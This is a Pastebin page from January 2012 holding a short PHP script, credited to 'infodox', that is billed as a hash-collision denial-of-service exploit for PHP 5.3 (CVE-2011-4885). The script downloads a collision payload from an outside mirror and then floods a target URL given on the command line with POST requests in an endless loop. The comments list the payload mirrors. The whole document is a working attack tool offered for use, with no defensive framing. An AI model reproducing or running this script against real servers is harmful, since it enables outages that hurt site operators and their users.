Advertisement
infodox

CVE-2011-4885 Hashtables Exploit

Jan 1st, 2012
684
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.77 KB | None | 0 0
  1. <?php
  2. /*
  3. PHP 5.3.* Hash Colission DoS Exploit by infodox
  4. Original version by itz me (opensc.ws)
  5. CVE-2011-4885
  6.  
  7. Mirrors List:
  8. http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
  9. http://jrs-s.net/hashcollide.txt
  10. http://www.infodox.co.cc/Downloads/hashcollide.txt
  11.  
  12. Changes:
  13. Different mirror for hashcollide.txt
  14. Now takes target as a command line argument
  15. Status message printing
  16.  
  17. Twitter: @info_dox
  18. Blog: blog.infodox.co.cc
  19. Site: http://www.infodox.co.cc/
  20. */
  21. $targ = $argv[1];
  22. $x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
  23. while(1) {
  24.  echo "firing";
  25.  $ch = curl_init("$targ");
  26.  curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
  27.  curl_exec($ch);
  28.  curl_close($ch);
  29.  echo "[+] Voly Sent!";
  30. }
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement